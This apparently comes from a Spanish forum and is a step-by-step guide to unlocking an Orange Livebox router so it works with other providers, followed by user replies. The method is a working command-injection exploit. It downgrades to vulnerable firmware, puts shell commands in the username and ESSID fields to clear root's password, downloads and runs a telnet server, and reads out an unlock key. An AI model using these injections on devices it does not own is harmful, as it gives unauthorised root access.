Liberar Livebox 2:Con servidor http en lugar de ftp

#1
Hola a todos los foreros: 
Tras muchas peticiones de varias personas de que ponga un manual en el que liberar el livebox pero con http en lugar de ftp,pues hoy lo voy a volver a colgar,despues de haber pedido permiso a Mrbunbury y a Flashfm(Autor del manual original,en el que se hace con servidor ftp. Antes de nada,para evitar confusiones,como la vez anterior,indicar que este manual,es igual al manual original,solo que este,esta MODIFICADO POR MI,y en este quito el paso del ftp,lo sustituyo por el del http,y,al cambiar el servidor,tambien he tenido que modificar los comandos y alguna que otra cosa del manual original.Os pongo una copia del link al manual original:
http://staff.adslzone.net/victorserrano ... r-livebox/.
Espero que esta vez no haya confusiones y que no me acusen de nada,y para que quede claro,lo repito,otra vez.ESTA ES UNA COPIA "MODIFICADA"DEL MANUAL ORIGINAL,YO SOLO HE ECHO EL PASO DEL SERVIDOR HTTP,LO DEMAS ES SACADO DEL MANUAL ORIGINAL DE NUESTRO COMPAÑERO,Flashfm.Y sin mas demora,el manual.: 

Liberar Livebox 

1. EL LIVEBOX 

Como ya sabreis, Orange distribuye el router Livebox bloqueado para que no se pueda usar con otros proveedores de internet. El bloqueo es a 2 niveles. 

1. Solo acepta conexiones PPPoE o PPPoA (las que ofrece Orange) 
2. Solo permite nombres de usuario del tipo xxx@orangeadsl, xxx@wanadooadsl y similares. Por tanto, no podremos configurarlo para usarlo con otro ISP. 

Al desbloquearlo conseguimos 2 cosas: 

1. Que nos permitirá seleccionar cualquier tipo de conexión: PPPoA, PPPoE, DHCP + NAT, RFC1483, bridge, 

2. Un aumento del rendimiento global en las velocidades de subida y bajada. 

2. QUE NECESITAREMOS 
Para desbloquear el router vamos a necesitar los siguientes elementos: 
1. Estar familiarizado en el manejo del router, asignación de ips privadas, etc 
2. Un pc 
3. Un cable USB 
4.El cd de configuración del Livebox. Si no lo tienes, puedes bajarlo desde aquí 
5. Un servidor http que debemos instalar en nuestro pc. En nuestro caso, usamos el Apache HTTP Server, que es un servidor http muy sencillo de instalar y configurar. 
6. Un servidor de telnet, utelnetd. 
7. Una utilidad para convertir el código que nos devuelve el router 
8. Unos 15 minutos de tiempo 

3. ¿EN QUE SE BASA EL DESBLOQUEO? 

El desbloqueo se basa en una vulnerabilidad de los firmwares antiguos que nos permite entrar comandos desde la configuración del ESSID. Lo que haremos es instalar en el router un servidor de telnet que nos permitirá ejecutar comandos en el router y que nos proporcione el código de desbloqueo del router. Una vez desbloqueado, tendremos acceso a todas las opciones del router sin ningún tipo de limitación impuesta por Orange. 

4. EL DOWNGRADE 

La vulnerabilidad de la inyección de comandos desde la ventana ESSID se corrigió en los últimos firmwares. Por tanto, lo primero que debemos hacer es hacer un downgrade del firmware del router, es decir, pasar a una versión anterior que tenga la vulnerabilidad. Para ello vamos a bajarnos el firmware adecuado desde aquí y lo guardamos en nuestro PC. 
Antes de desactualizar el firmware vamos a asignar una ip fija a nuestro pc. En nuestro caso será 10.0.0.2 y la del router será 10.0.0.1 (también puedes usar 192.168.1.1 y 192.168.1.2). 

Conectamos el Livebox y el PC usando el cable USB. Instalamos el software de configuración que viene en el CD. Una vez finalizado, vemos que tenemos una utilidad que se llama “configuración de fábrica USB”. 

Una vez pulsado, nos aparece una ventana donde hemos de seleccionar el firmware que vamos a instalar en el router. 

A partir de aquí el proceso se completa como una actualización normal de firmware. 

Una vez completado el proceso, tendremos el firmware vulnerable listo. 

5. EL SERVIDOR DE TELNET 

El Utelnetd lo renombraremos por comodidad a “u”. Lo podemos descargar desde su página o bien lo puedes descargar ya renombrado a “u” desde aquí. 

Guardamos el fichero en un directorio. 
6.EL SERVIDOR HTTP 
El servidor apache lo podemos descargar desde su pagina(http://www.apache.org)o bien lo podemos descargar tambien desde la zona descargar de adslzone. 
La instalacion es muy sencilla,simplemente ejecutamos el fichero que nos descarguemos y simplemente seguimos la instalacion hasta que lleguemos a este punto
 
tenemos que asegurarnos de seleccionar la opcion: 
Run when started manually,only for me. 
Cuando acabe la instalacion todo estara listo,para probar la instalacion debemos meternos en la pagina 10.0.0.2(O 192.168.1.2 segun la ip de nuestro pc)y nos debe salir una pagina como esta: 
 
Si no sale es porque hemos echo algo mal. 
Bueno,si nos sale esa pagina es que esta todo correcto y podemos empezar a usar el apache  
Entonces vamos a la ruta: 
C:\Archivos de programa\Apache Group\Apache\htdocs 
Y ahí pegamos el archivo "u". 
Luego para probar que todo esta correcto,vamos a la pagina http://10.0.0.2/u ohttp://192.168.1.2/u(Segun la ip de nuestro pc) 
y deberia de dejanos descargar el archivo "u" si no se descargar es porque hemos echo algo mal. 
Una vez echo esto finaliza el paso 6. 
7. INYECCIÓN DE COMANDOS 

Para inyectar los comandos y evitar errores os recomiendo que hagais un “copiar y pegar” de los comandos. 
Entramos en el router (admin/admin) y vamos a la pantalla de usuario conexión 

y en el nombre de usuario ponemos 

;echo root::0:0:root:/root:/bin/sh >/etc/passwd 

Con ello le quitamos la contraseña de root al router. 

Luego en Configuración->Avanzada->Inalámbrico, cambia el ESSID a: 

;cd /etc;wget http://10.0.0.2/u 

Pulsamos en “Enviar” y luego en “Aplicar”. Pasado unos instantes, el router se reinicia solo. 

Con ello lo que hacemos es decirle al router que se conecte por http a nuestro PC y se descargue el fichero “u”. Si tu PC usa otra ip solo tienes que sustituir 10.0.0.2 por la ip privada de tu PC. 

Ahora, volvemos a cambiar el ESSID y ponemos 

;chmod 777 /etc/u 
Con esta acción damos permisos de ejecución al fichero “u”. 
Por último, volvemos a cambiar el ESSID a 

;/etc/u -p 23 -l /bin/sh -d 

Una vez más pulsamos en “Enviar” y luego en “Aplicar”. El router se volverá a reiniciar. 

8. CONECTAR POR TELNET 

Si hemos realizado todos los pasos de manera correcta, podremos conectar via telnet con nuestro router. Abrimos una ventana de comandos y tecleamos “telnet 10.0.0.1″ y nos aparecerá el Busybox. 

Ahora debemos ejecutar lo siguiente en el telnet 

redboot_fconfig_get –parameter h235_key /dev/mtd4 

Nos devolverá una clave hexadecimal. La copiamos y la introducimos en esta página web 

http://www.agp.dsl.pipex.com/h235tounlock.html 

Nos devolverá la clave ya convertida lista para desbloquear el router. 

Por último, solo queda acceder por http al router e ir a la página http://10.0.0.1/brdgoff.html pegar el código de desbloqueo proporcionado por la página y ya tendremos el router liberado para cualquier operador y con un firmware sin restricciones. 

Una vez reiniciado el router, vemos como lo podremos configurar para cualquier ISP. 




Bueno espero que os sirva de algo,ya que en el paso del ftp del manual original,a veces el server ftp no funciona bien o no lo sabemos configurar.
Saludos
PD:Envio una copia de este post a Flashfm,para que si luego me acusan de plagio(Como cierta vez de la que no me quiero acordar) todos sepamos que no lo es.
Tutorial realizado por David Rodero para Adslzone.net
 
#2
Serviría para este router?


Es que... no se, he buscado de todo y nada... lo tengo desde octubre que un amigo se dio de baja en e todo en uno ese... lo uso como punto de acceso... pero vamos, me gustaría saber si existe la posibilidad de usarlo para moden-router tb... porque hora mismo no me deja meter datos de RFC1483 para mi ip fija.
 
#3
Pues...mucho me temo que aun no habra nada,ya que ese router salio hace poco,y aun nadie ha investigado con el.
Saludos y suerte.
 
#6
puerto 23

Yo llego justo antes de que abra el busybox, me da error en puerto 23 y no se puedo conectar.
Abro el contafuegos, el antivirus, el puerto 23 en el router(por web) y nada de nada.
He probado con 192.168.1.1 y 10.0.0.1 y nada.
Gracias por el manual y a ver si alguien me hecha una mano
Un saludo paisano
 
#8
Menudo cifrado

El código se genera con una simple transposición de los número de las posisiciones 0 a 15:
[0]=[9]
[1]=[4]
[2]=[1]
[3]=[12]
[4]=[14]
[5]=[5]
[6]=[13]
[7]=[6]
[8]=[15]
[9]=[3]
[10]=[8]
[11]=[0]
[12]=[7]
[13]=[10]
[14]=[2]
[15]=[11]

Criptoanalistas frances, supongo?

Si el Cesar levantara la cabeza. :p
 
#9
Buenaaass!!
muy bueno el manual, felicidades a todos.
Tengo un problema y es que no tengo el cd de instalacion del livebox2, entonces no puedo downgradearlo, dime alguna direccion o algo pa bajarmelo por favor.
Lo he buscado como un loco pero no encuentro nada.
Gracias de antemano.
 
#10
Hola a todos:

Queria saber si que este manual, es para el "livebox 2" ya que el titulo del post es liberar livebox 2, pero el enlace al que hace referencia, de donde se ha cogido el tutorial original, es de un livebox 1, el que tiene forma de libro abierto o triangulo
 
#11
Re: Serviría para este router?

Zim_Zum dijo:
Serviría para este router?


Es que... no se, he buscado de todo y nada... lo tengo desde octubre que un amigo se dio de baja en e todo en uno ese... lo uso como punto de acceso... pero vamos, me gustaría saber si existe la posibilidad de usarlo para moden-router tb... porque hora mismo no me deja meter datos de RFC1483 para mi ip fija.
Mucho me temo que no. Ese router es un Livebox PRO 2. He estado investigando pero todo está cerrado (el servidor Telnet, el Firmware) de manera que no te deja entrar.

Como las actualizaciones de Firmware són automáticas, el usuario NO puede cambiar el firmware manualmente (y es eso precisamente lo que nos da el control).

Seguiré investigando,
enviad cualquier pregunta o sugerencia a jmendeth@gmail.com
 
#12
liberar livebox 2

Ola buenas este tutorial es para el actual livebox 2 o para el livebox el primero
un salu2
 
#14
pagina del conversion de codigo no funciona

despues de leer muchos foros y animado por vuestros trabajos anteriores...me refiero a la ayuda que tube con mi red bridge y con el flasheo de un comtrend a asus....fue espectacular...y ahora queria conectar la impresora a un puerto usb de un livebox que he conseguido,pero esta totalmente capado,y estoy intentando liberar a willy...digo al livebox22 a willy es mucho mas facil,¿verdad?...ja,ja,ja
bueno aparte bromas me he leido todo el tutorial y memorizado,pero la pagina que convierte el codigo ya no existe,y temo cuando llegue a ese paso,que puedo hacer con el codigo?hay otro modo de convertirlo?

gracias a todos os doy un 10 por listos... ;) ;) :cool:
 
#15
Como mucha gente a preguntado, este manual sirve para liberar el Livebox 2.1 (el que no tiene botón central del wifi) Es nuevo, hace un mes que me lo enviaron. :) gracias!
 
Arriba